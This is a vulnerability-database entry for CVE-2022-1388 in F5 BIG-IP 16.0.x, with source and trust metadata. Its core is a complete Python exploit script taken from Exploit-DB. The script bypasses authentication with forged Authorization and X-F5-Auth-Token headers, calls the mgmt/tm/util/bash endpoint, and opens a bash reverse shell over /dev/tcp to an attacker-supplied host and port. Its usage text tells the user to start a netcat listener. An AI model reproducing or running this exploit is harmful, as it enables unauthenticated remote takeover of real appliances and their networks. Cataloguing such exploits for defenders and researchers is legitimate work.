ID

VAR-E-202205-0043


CVE

cve_id:CVE-2022-1388

Trust: 2.5

sources: PACKETSTORM: 167118 // PACKETSTORM: 167150 // PACKETSTORM: 167007 // EXPLOIT-DB: 50932

EDB ID

50932


TITLE

F5 BIG-IP 16.0.x - Remote Code Execution (RCE) - Multiple remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 50932

DESCRIPTION

F5 BIG-IP 16.0.x - Remote Code Execution (RCE). CVE-2022-1388 . remote exploit for Multiple platform

Trust: 1.0

sources: EXPLOIT-DB: 50932

AFFECTED PRODUCTS

vendor:f5model:big-ipscope:eqversion:16.0.x

Trust: 1.5

vendor:f5model:big-ip icontrolscope: - version: -

Trust: 0.5

vendor:f5model:big-ipscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 167118 // PACKETSTORM: 167150 // PACKETSTORM: 167007 // EXPLOIT-DB: 50932

EXPLOIT

# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388

from requests import Request, Session
import sys
import json

def title():
print('''

_______ ________ ___ ___ ___ ___ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ <
| |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |
\_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/



Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')

def exploit(url, lhost, lport):
url = url + 'mgmt/tm/util/bash'
data = {
"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"

}
headers = {
'Authorization': 'Basic YWRtaW46',
'Connection':'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token': '0'

}
s = Session()
req = Request('POST', url, json=data, headers=headers)
prepped = req.prepare()
del prepped.headers['Content-Type']
resp = s.send(prepped,
verify=False,
timeout=15
)
#print(prepped.headers)
#print(url)
#print(resp.headers)
#print(resp.json())
print(resp.status_code)

if __name__ == '__main__':
title()
if(len(sys.argv) < 4):
print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
exit(0)
else:
exploit(sys.argv[1],sys.argv[2],sys.argv[3])

Trust: 1.0

sources: EXPLOIT-DB: 50932

EXPLOIT LANGUAGE

py

Trust: 1.0

sources: EXPLOIT-DB: 50932

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 50932

TYPE

code execution

Trust: 1.0

sources: PACKETSTORM: 167118 // PACKETSTORM: 167007

TAGS

tag:exploit

Trust: 1.5

tag:remote

Trust: 1.5

tag:code execution

Trust: 1.5

tag:root

Trust: 0.5

tag:bash

Trust: 0.5

tag:bypass

Trust: 0.5

tag:proof of concept

Trust: 0.5

sources: PACKETSTORM: 167118 // PACKETSTORM: 167150 // PACKETSTORM: 167007

CREDITS

Yesith Alvarez

Trust: 1.0

sources: EXPLOIT-DB: 50932

EXTERNAL IDS

db:NVDid:CVE-2022-1388

Trust: 2.5

db:EXPLOIT-DBid:50932

Trust: 1.0

db:PACKETSTORMid:167118

Trust: 0.5

db:PACKETSTORMid:167150

Trust: 0.5

db:PACKETSTORMid:167007

Trust: 0.5

sources: PACKETSTORM: 167118 // PACKETSTORM: 167150 // PACKETSTORM: 167007 // EXPLOIT-DB: 50932

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2022-1388

Trust: 2.5

sources: PACKETSTORM: 167118 // PACKETSTORM: 167150 // PACKETSTORM: 167007 // EXPLOIT-DB: 50932

SOURCES

db:PACKETSTORMid:167118
db:PACKETSTORMid:167150
db:PACKETSTORMid:167007
db:EXPLOIT-DBid:50932

LAST UPDATE DATE

2022-07-27T09:23:57.674000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:167118date:2022-05-12T15:35:02
db:PACKETSTORMid:167150date:2022-05-12T16:11:08
db:PACKETSTORMid:167007date:2022-05-09T16:17:42
db:EXPLOIT-DBid:50932date:2022-05-12T00:00:00